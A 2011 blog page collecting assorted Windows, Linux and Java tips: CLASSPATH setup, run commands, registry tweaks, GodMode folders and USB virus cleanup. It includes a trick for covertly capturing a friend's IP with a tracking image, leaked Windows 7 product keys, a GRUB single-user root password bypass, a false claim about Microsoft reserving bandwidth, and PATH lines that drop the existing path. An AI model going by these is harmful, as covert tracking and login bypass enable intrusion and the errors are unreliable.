Wednesday, August 31, 2011

ghell...sorry to be a pain...but you actually need to use the CLASSPATH variable...and it should at the least contain the following value ".;"

classpath

Yeah, a dot and a semi-colon....why you might ask?...here is a simple answer.

The dot instructs the javac command to look for class definitions in the same directory of your file...before looking else where (JAVA_HOME). This means that if you have packages in your project...javac won't have problems compiling your files because it will start looking there first...and obviously...speed up the whole process of compilations.

Therefore...I would recommend the following setup

JAVA_HOME=C:\Program Files\Java\jdk1.6.0_01;
PATH=%JAVA_HOME%\bin;%PATH%;
CLASS_PATH=.;

PATH and CLASSPATH

This section explains how to use the PATH and CLASSPATH environment variables on Microsoft Windows, Solaris, and Linux. Consult the installation instructions included with your installation of the Java Development Kit (JDK) software bundle for current information.

After installing the software, the JDK directory will have the structure shown below.

The bin directory contains both the compiler and the launcher.
Update the PATH Variable (Microsoft Windows NT/2000/XP)
You can run Java applications just fine without setting the PATH variable. Or, you can optionally set it as a convenience.

Set the PATH variable if you want to be able to conveniently run the executables (javac.exe, java.exe, javadoc.exe, and so on) from any directory without having to type the full path of the command. If you do not set the PATH variable, you need to specify the full path to the executable every time you run it, such as:

C:\Program Files\Java\jdk1.6.0\bin\javac MyClass.java

Note: It is useful to set the PATH permanently so it will persist after rebooting. To set it permanently, add the full path of the jdk1.6.0 bin directory to the PATH variable. Set the PATH as follows.

To make a permanent change to the CLASSPATH variable, use the System icon in the Control Panel. The precise procedure varies depending on the version of Windows.

The PATH can be a series of directories separated by semicolons (;). Microsoft Windows looks for programs in the PATH directories in order, from left to right. You should have only one bin directory for the JDK in the path at a time (those following the first are ignored), so if one is already present, you can update that particular entry.

Update the PATH Variable (Solaris and Linux)
You can run the JDK just fine without setting the PATH variable, or you can optionally set it as a convenience. However, you should set the path variable if you want to be able to run the executables (javac, java, javadoc, and so on) from any directory without having to type the full path of the command. If you do not set the PATH variable, you need to specify the full path to the executable every time you run it, such as:

% /usr/local/jdk1.6.0/bin/javac MyClass.java

To find out if the path is properly set, execute:

% java -version

This will print the version of the java tool, if it can find it. If the version is old or you get the error java: Command not found, then the path is not properly set.

To set the path permanently, set the path in your startup file.

For C shell (csh), edit the startup file (~/.cshrc):

set path=(/usr/local/jdk1.6.0/bin )

For bash, edit the startup file (~/.bashrc):

PATH=/usr/local/jdk1.6.0/bin:
export PATH

For ksh, the startup file is named by the environment variable, ENV. To set the path:

PATH=/usr/local/jdk1.6.0/bin:
export PATH

For sh, edit the profile file (~/.profile):

PATH=/usr/local/jdk1.6.0/bin:
export PATH

Then load the startup file and verify that the path is set by repeating the java command:

For C shell (csh):

% source ~/.cshrc
% java -version

For ksh, bash, or sh:

% . /.profile
% java -version

Checking the CLASSPATH variable (All platforms)
The CLASSPATH variable is one way to tell applications, including the JDK tools, where to look for user classes. (Classes that are part of the JRE, JDK platform, and extensions should be defined through other means, such as the bootstrap class path or the extensions directory.)

The preferred way to specify the class path is by using the -cp command line switch. This allows the CLASSPATH to be set individually for each application without affecting other applications. Setting the CLASSPATH can be tricky and should be performed with care.

The default value of the class path is ".", meaning that only the current directory is searched. Specifying either the CLASSPATH variable or the -cp command line switch overrides this value.

To check whether CLASSPATH is set on Microsoft Windows NT/2000/XP, execute the following:

C:> echo %CLASSPATH%

On Solaris or Linux, execute the following:

% echo $CLASSPATH

If CLASSPATH is not set you will get a CLASSPATH: Undefined variable error (Solaris or Linux) or simply %CLASSPATH% (Microsoft Windows NT/2000/XP).

To modify the CLASSPATH, use the same procedure you used for the PATH variable.

Class path wildcards allow you to include an entire directory of .jar files in the class path without explicitly naming them individually. For more information, including an explanation of class path wildcards, and a detailed description on how to clean up the CLASSPATH environment variable, see the Setting the Class Path technical note.
How to find your friend's IP:

Find you friend IP by just using the following simple trick,

Go>www.spypig.com
>Enter your E-Mail ID
>Copy the image which is provided there
>You have 60sec
>Paste and send it to your friend (whos IP is to be found out)
>When your friend opens it,you wil get his/her IP..
Free Windows 7 Product Keys for Release Candidate (RC) Activation

The Windows 7 product keys given away by Microsoft to Windows 7 Release Candidate (RC) downloaders appear to be from a pool of same 15 sets of product keys, similar to what’s happen during public availability of Windows 7 Beta where everybody gets the same sets of Windows 7 Beta product keys, after massive interest crashed the Microsoft servers.

After downloading and installing the 32-bit and 64-bit Windows 7 RC x86 and x64 DVD ISO images, the default activation grace period of 30 days applies. For users who want to use the Windows 7 RC systems beyond 30 days activation period, use one of the following free product keys to activate the Windows 7 system.

Download Windows 7 RC ISO and Product Key

Free Windows 7 RC Activation Product Keys

MM7DF-G8XWM-J2VRG-4M3C4-GR27X
KGMPT-GQ6XF-DM3VM-HW6PR-DX9G8
MVBCQ-B3VPW-CT369-VM9TB-YFGBP
KBHBX-GP9P3-KH4H4-HKJP4-9VYKQ
BCGX7-P3XWP-PPPCV-Q2H7C-FCGFR
RGQ3V-MCMTC-6HP8R-98CDK-VP3FM
Q3VMJ-TMJ3M-99RF9-CVPJ3-Q7VF3
6JQ32-Y9CGY-3Y986-HDQKT-BPFPG
P72QK-2Y3B8-YDHDV-29DQB-QKWWM
6F4BB-YCB3T-WK763-3P6YJ-BVH24
9JBBV-7Q7P7-CTDB7-KYBKG-X8HHC
C43GM-DWWV8-V6MGY-G834Y-Y8QH3
GPRG6-H3WBB-WJK6G-XX2C7-QGWQ9
MT39G-9HYXX-J3V3Q-RPXJB-RQ6D7
MVYTY-QP8R7-6G6WG-87MGT-CRH2P

The product keys can be used to activate both 32bit and 64bit Windows 7 RC.

chat

If you chat very frequently with one of your friend then now you can make gtalk chat shortcut on your desktop. It willl initiate a chat with only one click. On click it opens a chat window where you can chat with your friend. But unfortunately this trick works only in window xp nt in window vista.
Here are steps to follow:
1) Right click on your desktop and go to New > Shortcut.
2) In create shortcut window, type gtalk:chat?jid= username@ gmail.com. Where username is gmail id of your friend.
3) Click ok.
Its done.
You can also make shortcut to call your friend for that you have to write gtalk:call?jid= username@ gmail.com
IP address of your connection


Go to start/run type 'cmd'
then type 'ipconfig'
Add the '/all' switch for more info.
IP commands
Display Connection Configuration: ipconfig /all or ipconfig/?

Display DNS Cache Info Configuration: ipconfig /displaydns

Clear DNS Cache: ipconfig /flushdns

Release All IP Address Connections: ipconfig /release

Renew All IP Address Connections: ipconfig /renew

Re-Register the DNS connections: ipconfig /registerdns

Display DHCP Class Information:ipconfig /showclassid

Change/Modify DHCP Class ID: ipconfig /setclassid

Network Connections: control netconnections

Network Setup Wizard: netsetup.cpl

Test Connectivity: ping

Trace IP address Route: tracert

Displays the TCP/IP protocol sessions: netstat

Display Local Route: route

Display Resolved MAC Addresses: arp

Display Name of Computer Currently on: hostname
Windows 7 Beta 32-bit Product Key

6JKV2-QPB8H-RQ893-FW7TM-PBJ73
TQ32R-WFBDM-GFHD2-QGVMH-3P9GC
GG4MQ-MGK72-HVXFW-KHCRF-KW6KY
4HJRK-X6Q28-HWRFY-WDYHJ-K8HDH
QXV7B-K78W2-QGPR6-9FWH9-KGMM7
Reset the root password in Linux Systems.

1) When it shows the two Os (Windows, Red hat), highlight the red hat option and Press ‘e’.
2) This will show two or three options; in these one of the options will have ‘kernel’ word. Highlight that option and press ‘e’.
3) This will show the grub command line, in that line shown press a space and type ‘1’(no single quotes) to login into the single user mode and press Enter.
4) Linux will start to load and it will show # prompt.
5) Now type ‘passwd’, this will prompt for the new password.
6) Type the new password, once again it will ask for retype, retype once again and press enter.
7) Type exit to quit the prompt and linux will start to load.
8) Now you can login into the root user with your changed password.

Secret ‘GodModes’ in Windows 7
7 January 2010 6 Comments Posted By Ashik
StumbleUpon.com
Share
5 retweet

The foxy-sounding name is a little deceiving, because as far as we know, it is exactly what people are calling it – a glorified control panel. However, that goes without saying how useful this feature actually is.

GodMode is the name given to cheats in video games that provided you with all weapons and access to all areas. As it turns out, Windows 7 has a GodMode cheat as well. It is basically a control panel of sorts which provides you access to all the features in one explorer window. In the Windows 7 control panel, features are grouped together either in categories or control panel item names. Nothing is grouped under anything in GodMode.
How to access GodMode?

Method 1:

1. Create a new folder and name it GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

2. The icon will be changed automatically to Control Panel’s icon.

3. Now open the folder and see the magic of Windows Registry!

Method 2

1. Create a shortcut with following path and set desired icon:

explorer.exe shell:::{ED7BA470-8E54-465E-825C-99712043E01C}

Note: Sometimes it kills explorer.exe using Method 1! probably Windows Vista x64 editions. Therefore I suggest to use Method 2.
Solution for the Crash

To get rid of this issue, Boot into Safe Mode with Command Prompt and delete that folder. For eg. You created a folder GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} on desktop, So either navigate to Desktop folder execute the following command:

RmDir “GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”

Or type the absolute path of folder, like-

RmDir “C:\Users\\Desktop\GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”

Applies To:

* Windows Vista x86 editions
* Windows Vista x64 editions
* Windows 7 x86 editions
* Windows 7 x64 editions

Windows has lot of GodModes

It is found that there are lot of GodModes and they differ based on the Strings used in Name the Folder.

In an e-mail interview, Steven Sinofsky, Windows division president, said several similar undocumented features provide direct access to all kinds of settings, from choosing a location to managing power settings to identifying biometric sensors.

As with the all-encompassing GodMode uncovered by bloggers, these other settings can be accessed directly by creating a new folder with any name (GodMode or otherwise) and then including a certain text string. Sinofsky noted more than a dozen strings create particular settings folders, in addition to the overarching GodMode folder option.

For example, the first one could be a folder named “Hungry Hacker.{00C6D95F-329C-409a-81D7-C46C66EA7F33}” (use everything inside quotes–but not the quotes themselves).

Here’s the list of strings:

{00C6D95F-329C-409a-81D7-C46C66EA7F33}
{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}
{025A5937-A6BE-4686-A844-36FE4BEC8B6D}
{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}
{1206F5F1-0569-412C-8FEC-3204630DFB70}
{15eae92e-f17a-4431-9f28-805e482dafd4}
{17cd9488-1228-4b2f-88ce-4298e93e0966}
{1D2680C9-0E2A-469d-B787-065558BC7D43}
{1FA9085F-25A2-489B-85D4-86326EEDCD87}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
{2227A280-3AEA-1069-A2DE-08002B30309D}
{241D7C96-F8BF-4F85-B01F-E2B043341A4B}
{4026492F-2F69-46B8-B9BF-5654FC07E423}
{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}
{78F3955E-3B90-4184-BD14-5397C15F1EFC}
How to prevent your PEN drive from VIRUS

Friends many of your PC/laptop's normally gets virus because of Pen Drives or USB devices (Even PC's who are not connected to network ). Some Virus like Ravmon Virus , Heap41a worm which are not detected by anti virus normally spreads mostly by the Pen Drives . In such a case what can you do to prevent your PC from getting infected with Virus that spreads through USB devices or Pen Drives ?
You can protect your PC by just following the simple steps below . It won't take much time.

Connect your Pen Drive or USB drive to your computer .
Now a dialogue window will popup asking you to choose among the options as shown in the figure.
Don't choose any of them , Just simply click Cancel.

*Now go to Start--> Run and type cmd to open the Command Prompt window .

*Now go to My Computer and Check the Drive letter of your USB drive or Pen Drive.
( E.g. If it is written Kingston (I), then I: will be the drive letter .)

*In the Command Window ( cmd ) , type the drive letter: and Hit Enter .

*Now type dir/w/o/a/p and Hit Enter

*You will get a list of files . In the list , search if anyone of the following do exist

1. Autorun.inf
2. New Folder.exe
3. Bha.vbs
4. Iexplore.vbs
5. Info.exe
6. New_Folder.exe
7. Ravmon.exe
8. RVHost.exe or any other files with .exe Extension .

If you find any one of the files above , Run the command attrib -h -r -s -a *.* and Hit Enter.

Now Delete each File using the following Command del filename ( E.g del autorun.inf ) .

That's it .Now just scan your USB drive with the anti virus you have to ensure that you made your Pen
Drive free of Virus .

Hi Frnds...
This virus is very very common now...
To know whether ur system is infected just type C:\heap41a in the address bar...
if there is a folder named heap41a, then ur system is infected...
(AVAST antivirus is the best solution for this worm...) symantec also works
Available for users only
Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC etc

You can get it back:

Click Start then Run and type "gpedit.msc" without quotes.This opens the group policy editor. Then go to:

Local Computer Policy >
Computer Configuration >
Administrative Templates >
Network >
QOS Packet Scheduler >
then to Limit Reservable Bandwidth

Double click on Limit Reservable bandwidth. It will say it is not
configured, but the truth is under the 'Explain' tab i.e."By default,
the Packet Scheduler limits the system to 20 percent of the bandwidth
of a connection, but you can use this setting to override the default."
So the trick is to ENABLE reservable bandwidth, then set it to ZERO.
This will allow the system to reserve nothing, rather than the default
20%. It works on Win 2000 as well.
20 things you didn't know about Windows XP

You've read the reviews and digested the key feature enhancements and operational changes. Now it's time to delve a bit deeper and uncover some of Windows XP's secrets.

1. It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they went between boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'. The computer will produce a lot of useful info, including the uptime. If you want to keep these, type 'systeminfo > info.txt'. This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

2. You can delete files immediately, without having them move to the Recycle Bin first. Go to the Start menu, select Run... and type 'gpedit.msc'; then select User Configuration, Administrative Templates, Windows Components, Windows Explorer and find the Do not move deleted files to the Recycle Bin setting. Set it. Poking around in gpedit will reveal a great many interface and system options, but take care -- some may stop your computer behaving as you wish. (Professional Edition only).

3. You can lock your XP workstation with two clicks of the mouse. Create a new shortcut on your desktop using a right mouse click, and enter 'rundll32.exe user32.dll,LockWorkStation' in the location field. Give the shortcut a name you like. That's it -- just double click on it and your computer will be locked. And if that's not easy enough, Windows key + L will do the same.

4. XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to the Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

5. For those skilled in the art of DOS batch files, XP has a number of interesting new commands. These include 'eventcreate' and 'eventtriggers' for creating and watching system events, 'typeperf' for monitoring performance of various subsystems, and 'schtasks' for handling scheduled tasks. As usual, typing the command name followed by /? will give a list of options -- they're all far too baroque to go into here.


6. XP has IP version 6 support -- the next generation of IP. Unfortunately this is more than your ISP has, so you can only experiment with this on your LAN. Type 'ipv6 install' into Run... (it's OK, it won't ruin your existing network setup) and then 'ipv6 /?' at the command line to find out more. If you don't know what IPv6 is, don't worry and don't bother.


7. You can at last get rid of tasks on the computer from the command line by using 'taskkill /pid' and the task number, or just 'tskill' and the process number. Find that out by typing 'tasklist', which will also tell you a lot about what's going on in your system.
8. XP will treat Zip files like folders, which is nice if you've got a fast machine. On slower machines, you can make XP leave zip files well alone by typing 'regsvr32 /u zipfldr.dll' at the command line. If you change your mind later, you can put things back as they were by typing 'regsvr32 zipfldr.dll'.


9. XP has ClearType -- Microsoft's anti-aliasing font display technology -- but doesn't have it enabled by default. It's well worth trying, especially if you were there for DOS and all those years of staring at a screen have given you the eyes of an astigmatic bat. To enable ClearType, right click on the desktop, select Properties, Appearance, Effects, select ClearType from the second drop-down menu and enable the selection. Expect best results on laptop displays. If you want to use ClearType on the Welcome login screen as well, set the registry entry HKEY_USERS/.DEFAULT/Control Panel/Desktop/FontSmoothingType to 2.


10. You can use Remote Assistance to help a friend who's using network address translation (NAT) on a home network, but not automatically. Get your pal to email you a Remote Assistance invitation and edit the file. Under the RCTICKET attribute will be a NAT IP address, like 192.168.1.10. Replace this with your chum's real IP address -- they can find this out by going to www.whatismyip.com -- and get them to make sure that they've got port 3389 open on their firewall and forwarded to the errant computer.


11. You can run a program as a different user without logging out and back in again. Right click the icon, select Run As... and enter the user name and password you want to use. This only applies for that run. The trick is particularly useful if you need to have administrative permissions to install a program, which many require. Note that you can have some fun by running programs multiple times on the same system as different users, but this can have unforeseen effects.


12. Windows XP can be very insistent about you checking for auto updates, registering a Passport, using Windows Messenger and so on. After a while, the nagging goes away, but if you feel you might slip the bonds of sanity before that point, run Regedit, go to HKEY_CURRENT_USER/Software/Microsoft/Windows/Current Version/Explorer/Advanced and create a DWORD value called EnableBalloonTips with a value of 0.


13. You can start up without needing to enter a user name or password. Select Run... from the start menu and type 'control userpasswords2', which will open the user accounts application. On the Users tab, clear the box for Users Must Enter A User Name And Password To Use This Computer, and click on OK. An Automatically Log On dialog box will appear; enter the user name and password for the account you want to use.


14. Internet Explorer 6 will automatically delete temporary files, but only if you tell it to. Start the browser, select Tools / Internet Options... and Advanced, go down to the Security area and check the box to Empty Temporary Internet Files folder when browser is closed.


15. XP comes with a free Network Activity Light, just in case you can't see the LEDs twinkle on your network card. Right click on My Network Places on the desktop, then select Properties. Right click on the description for your LAN or dial-up connection, select Properties, then check the Show icon in notification area when connected box. You'll now see a tiny network icon on the right of your task bar that glimmers nicely during network traffic.


16. The Start Menu can be leisurely when it decides to appear, but you can speed things along by changing the registry entry HKEY_CURRENT_USER/Control Panel/Desktop/MenuShowDelay from the default 400 to something a little snappier. Like 0.


17. You can rename loads of files at once in Windows Explorer. Highlight a set of files in a window, then right click on one and rename it. All the other files will be renamed to that name, with individual numbers in brackets to distinguish them. Also, in a folder you can arrange icons in alphabetised groups by View, Arrange Icon By... Show In Groups.


18. Windows Media Player will display the cover art for albums as it plays the tracks -- if it found the picture on the Internet when you copied the tracks from the CD. If it didn't, or if you have lots of pre-WMP music files, you can put your own copy of the cover art in the same directory as the tracks. Just call it folder.jpg and Windows Media Player will pick it up and display it.


19. Windows key + Break brings up the System Properties dialogue box; Windows key + D brings up the desktop; Windows key + Tab moves through the taskbar buttons.


20. The next release of Windows XP, codenamed Longhorn, is due out late next year or early 2003 and won't be much to write home about. The next big release is codenamed Blackcomb and will be out in 2003/2004.

117 Run Commands In Windows Xp

1. Accessibility Controls - access.cpl

2. Accessibility Wizard - accwiz

3. Add Hardware Wizard - hdwwiz.cpl

4. Add/Remove Programs - appwiz.cpl

5. Administrative Tools - control admintools

6. Automatic Updates - wuaucpl.cpl

7. Bluetooth Transfer Wizard - fsquirt

8. Calculator - calc

9. Certificate Manager - certmgr.msc

10. Character Map - charmap

11. Check Disk Utility - chkdsk

12. Clipboard Viewer - clipbrd

13. Command Prompt - cmd

14. Component Services - dcomcnfg

15. Computer Management - compmgmt.msc

16. Control Panel - control

17. Date and Time Properties - timedate.cpl

18. DDE Shares - ddeshare

19. Device Manager - devmgmt.msc

20. Direct X Troubleshooter - dxdiag

21. Disk Cleanup Utility - cleanmgr

22. Disk Defragment - dfrg.msc

23. Disk Management - diskmgmt.msc

24. Disk Partition Manager - diskpart

25. Display Properties - control desktop

26. Display Properties - desk.cpl

27. Dr. Watson System Troubleshooting Utility - drwtsn32

28. Driver Verifier Utility - verifier

29. Event Viewer - eventvwr.msc

30. Files and Settings Transfer Tool - migwiz

31. File Signature Verification Tool - sigverif

32. Findfast - findfast.cpl

33. Firefox - firefox

34. Folders Properties - control folders

35. Fonts - control fonts

36. Fonts Folder - fonts

37. Free Cell Card Game - freecell

38. Game Controllers - joy.cpl

39. Group Policy Editor (for xp professional) - gpedit.msc

40. Hearts Card Game - mshearts

41. Help and Support - helpctr

42. HyperTerminal - hypertrm

43. Iexpress Wizard - iexpress

44. Indexing Service - ciadv.msc

45. Internet Connection Wizard - icwconn1

46. Internet Explorer - iexplore

47. Internet Properties - inetcpl.cpl

48. Keyboard Properties - control keyboard

49. Local Security Settings - secpol.msc

50. Local Users and Groups - lusrmgr.msc

51. Logs You Out Of Windows - logoff

52. Malicious Software Removal Tool - mrt

53. Microsoft Chat - winchat

54. Microsoft Movie Maker - moviemk

55. Microsoft Paint - mspaint

56. Microsoft Syncronization Tool - mobsync

57. Minesweeper Game - winmine

58. Mouse Properties - control mouse

59. Mouse Properties - main.cpl

60. Netmeeting - conf

61. Network Connections - control netconnections

62. Network Connections - ncpa.cpl

63. Network Setup Wizard - netsetup.cpl

64. Notepad notepad

65. Object Packager - packager

66. ODBC Data Source Administrator - odbccp32.cpl

67. On Screen Keyboard - osk

68. Outlook Express - msimn

69. Paint - pbrush

70. Password Properties - password.cpl

71. Performance Monitor - perfmon.msc

72. Performance Monitor - perfmon

73. Phone and Modem Options - telephon.cpl

74. Phone Dialer - dialer

75. Pinball Game - pinball

76. Power Configuration - powercfg.cpl

77. Printers and Faxes - control printers

78. Printers Folder - printers

79. Regional Settings - intl.cpl

80. Registry Editor - regedit

81. Registry Editor - regedit32

82. Remote Access Phonebook - rasphone

83. Remote Desktop - mstsc

84. Removable Storage - ntmsmgr.msc

85. Removable Storage Operator Requests - ntmsoprq.msc

86. Resultant Set of Policy (for xp professional) - rsop.msc

87. Scanners and Cameras - sticpl.cpl

88. Scheduled Tasks - control schedtasks

89. Security Center - wscui.cpl

90. Services - services.msc

91. Shared Folders - fsmgmt.msc

92. Shuts Down Windows - shutdown

93. Sounds and Audio - mmsys.cpl

94. Spider Solitare Card Game - spider

95. SQL Client Configuration - cliconfg

96. System Configuration Editor - sysedit

97. System Configuration Utility - msconfig

98. System Information - msinfo32

99. System Properties - sysdm.cpl

100. Task Manager - taskmgr

101. TCP Tester - tcptest

102. Telnet Client - telnet

103. User Account Management - nusrmgr.cpl

104. Utility Manager - utilman

105. Windows Address Book - wab

106. Windows Address Book Import Utility - wabmig

107. Windows Explorer - explorer

108. Windows Firewall - firewall.cpl

109. Windows Magnifier - magnify

110. Windows Management Infrastructure - wmimgmt.msc

111. Windows Media Player - wmplayer

112. Windows Messenger - msmsgs

113. Windows System Security Tool - syskey

114. Windows Update Launches - wupdmgr

115. Windows Version - winver116. Windows XP Tour Wizard - tourstart

117. Wordpad - write

Cannot enable Show Hidden files Check
A common virus disables the Show hidden files and folders function in Windows XP. Here is how to enable it again.

The symptom of this problem is every time you select the Show hidden files and folders options under Folder Options, the screen just flashes when you click OK and the hidden files and folders are not unhidden.

You can fix this problem with a registry hack:

1. Click Start > Run and type REGEDIT
2. Click the plus sign next to HKEY_CURRENT_USER then SOFTWARE then Microsoft

then Windows then CurrentVersion then Explorer then Advanced then Folder
then Hidden then Showall

On the right side, double click on the checked value and give it a value of 1.

You should now be able to enable hidden files and folders

Branding Windows With Your Name


open notepad dump the following lines into it and save it with the name OEMINFO.INI in the c:\windows\system32 directory:


[General]
Manufacturer=Your Name Here
Model=Your Model Here
[Support Information]
Line1=Your Name Here
Line2=Your Address Here
Line3=Your Email Address Here
ACCESS DIFFERENT PROGRAMS THROUGH RUN COMMAND


• appwiz.cpl — Used to run Add/Remove wizard
• Calc –Calculator
• Cfgwiz32 –ISDN Configuration Wizard
• Charmap –Character Map
• Chkdisk –Repair damaged files
• Cleanmgr –Cleans up hard drives
• Clipbrd –Windows Clipboard viewer
• Cmd –Opens a new Command Window
• Control mouse –Used to control mouse properties
• Control –Displays Control Panel
• Dcomcnfg –DCOM user security
• Debug –Assembly language programming tool
• Defrag –Defragmentation tool
• Drwatson –Records programs crash & snapshots
• Dxdiag –DirectX Diagnostic Utility
• Explorer –Windows Explorer
• Fontview –Graphical font viewer
• Fsmgmt.msc — Used to open shared folders
• Firewall.cpl — Used to configure windows firewall
• Ftp -ftp.exe program
• Hostname –Returns Computer’s name
• Hdwwiz.cpl — Used to run Add Hardware wizard
• Ipconfig –Displays IP configuration for all network adapters
• Logoff — Used to logoff the computer
• MMC –Microsoft Management Console
• Msconfig –Configuration to edit startup files
• Mstsc — Used to access remote desktop
• Mrc — Malicious Software Removal Tool
• Msinfo32 –Microsoft System Information Utility
• Nbtstat –Displays stats and current connections using NetBIOS over TCP/IP
• Netstat –Displays all active network connections
• Nslookup–Returns your local DNS server
• Osk —Used to access on screen keyboard
• Perfmon.msc — Used to configure the performance of Monitor.
• Ping –Sends data to a specified host/IP
• Powercfg.cpl — Used to configure power option
• Regedit –Registry Editor
• Regwiz — Registration wizard
• Sfc /scannow – System File Checker
• Sndrec32 –Sound Recorder
• Shutdown — Used to shutdown the windows
• Spider — Used to open spider solitaire card game
• Sfc / scannow — Used to run system file checker utility.
• Sndvol32 –Volume control for soundcard
• Sysedit – Edit system startup files
• Taskmgr –Task manager
• Telephon.cpl — Used to configure modem options.
• Telnet –Telnet program
• Tracert –Traces and displays all paths required to reach an internet host
• Winchat — Used to chat with Microsoft
• Wmplayer — Used to run Windows Media player
• Wab — Used to open Windows address Book.
• WinWord — Used to open Microsoft word
• Winipcfg –Displays IP configuration
• Winver — Used to check Windows Version
• Wupdmgr –Takes you to Microsoft Windows Update
• Write — Used to open WordPad

CHANGE PROCESSOR NAME


GO TO START>RUN>TYPE REGEDIT>HKEY_LOCAL_MACHINE>HARDWARE>DISCRIPTION>
SYSTEM>CENTRAL PROCESSOR>
ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND THEN WRITE ANYTHING U WANT IN THAT TEXTBOX

Change the Default Directory of Software Installation


You may want to change the location of your system default folder (C:\Program Files) from C drive to another system drives (D or E drive). By default software setup will attempt to install program in C:\Program Files directory. It is good practice to make the backup of the installed programs, if you installed all your programs in other than C drive. If you have little knowledge about editing windows registry then you can configure your computer for this purpose.
Follow the given steps to configure windows registry:
1. Click on Start button then type Regedit in Run option.
2. Here navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion
3. In right side panel, double click on ProgramFileDir.
4. Now modify the value to any other drive (for example D:\Program Files).
Now close the registry editor and restart your computer after any changes to go into effect.

Add Or Stop Programs During Startup


You can start or stop programs from executing at bootup by adding or deleting them to/from the run Keys in the Registry. Windows loads programs to start in the following order; Program listed in the Local Machine hive, then the Current User hive, then theWin.ini Run= and Load = lines. then finally programs in your Start Up folder.


To add or remove programs in the Registry
1.Open RegEdit

2.Go to the desired

KeyHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices

3. Add a new String Value and name it anything you like

4. For the value data, enter the path and executable for the program you want to run.

By adding the value to the HKEY_CURRENT_USER hive instead allows the program to start only when that user is logged on.

If you add the value to the RunOnce key the program will run once and be removed from the key by Windows

10 Steps you should do when your Computer Hangs up
You are in the middle of doing your work, suddenly you realized your computer hanged up. But the problem is, you have not saved your work! Don’t panic! There is a solution for that! And you can surely save your file! Here’s how:


1. Click on “ctrl-alt-delete” keys.

The windows task manager will then open, click on all programs that you don’t need and end the task. You will see that all programs on your taskbar will close one by one. If this will resolve the issue! – then save! (tip# 1: if you’re working on an MS Office application, it will automatically save your file in case the programs suddenly shut down — tip# 2: always save your file at least every 2 minutes by just simply clicking on the “diskette icon”— its just one click!)


2. If it did not resolve the issue,

are there some users logged on that computer? If so, go to switch user (for XP) and log off that user, go back to your log on screen and log on again.


The reason the computer hang up is because if there are many open programs and applications, these retains in the memory, if it is too much for the memory to handle, it freezes! Another reason too the computer hang up is because if you are connected to the internet via dial up, and you are running too many applications and opening many websites. So I suggest, if you are multimedia user or a heavy internet user, then you are better off with a higher memory, at least 512Mb of memory.


There are simple ways to avoid computer to freeze or hang up:


3. Clean your history at least once a week

>tools>internet options>clear history. I normally set my history to “0”, meaning, when I restart my computer, it doesn’t save history pages that I have visited


4. Delete all internet temporary files

>tools>internet options>delete files (do the “offline” content too!)


5. Delete cookies

(some do not do this, but I do delete cookies at least once a week!) >tools>internet options>delete cookies
6. Remove unnecessary programs that you no longer use
they are just occupying space and memory! >control panel>add/remove programs


7. Do defragmentation at least once a week

>point the mouse to “start” button, then right click “explore”>right click the mouse pointing to drive C (which is usually the main system logical drive) >properties>tools>defragment now


8. You can also check the logical drive’s volume for errors

>point the mouse to “start” button, then right click “explore”>right click the mouse pointing to drive C (I repeat, is usually the main system logical drive) >properties>tools>check now


9. It is better to have only one user being logged on.

Even if there are many users, make sure the user logs off after using the computer, rather than keeping it logged on and you do the switching of users. Switching users is good as long as you don’t keep all users logged on—I think that is more logical


10. Always shut down properly the computer

(do NOT use the power button when turning it off!
How to disable/enable the usage of USB storage devices?

USB drives (also known as flash drive, mobile disk or pen drive) are becoming the most popular standard in these days to store and move data. USB support is available in PCs of both IBM-compatible and Apple computers. USB port support hot plugging and plug & play. The USB allows up to 127 devices to be connected to the bus via a single port. The driver name "usbstor.sys" is used to communicate any USB drives to the operating system.

USB drives are indeed very useful in these days but a user can easily use to transfer any confidential information from your computer to others and can also upload viruses affected files to your computer by accidentally or deliberately. But you can prevent the users to connect any USB drives in the computer by disabling the ability of "usbstor.sys" (USB driver) to load in system. It will block the USB storage devices only and your system USB keyboard, mouse and others USB devices will work properly.

Perform the following steps to block the USB storage devices:

To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button to open "Run" and type "regedit" then press Ok button to open the Registry Editor.

In registry editor locate the given path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

Here select the "USBSTOR" folder and in right side of the registry editor panel find the value with name "Start".

Double click on "Start" and then set its value 4 under "Value data" section.

Close the Registry editor and restart your computer for changes to apply.

Now when you want to restore the default setting, open the Registry Editor and set its value back to 3.

Now again close the Registry editor and restart your computer for changes to apply.


Restore Previously Open Folders After Shutdown

If you need to access lot of folders on your home computer or on the network regularly, then you can set them re-open automatically, when you will login, shutdown or restart your computer next time. There is no need to open regularly used folders manually, just configure the simple sitting, your computer will automatically reload all the previously opened windows.

By default windows XP disables this option to reload automatically all the previously opened windows, when you login on, shutdown or restart your computer.

Follow the given steps to configure your computer to reload previously opened folders automatically after shutdown.

To edit this feature, you will need to be logged into your computer with administrative rights.
First click on Start button then go to Control Panel.
Open the “Appearance and Themes” option in control panel then click on Folder Options.
A small windows dialog box will appear with the title “Folder options”, click on View tab.
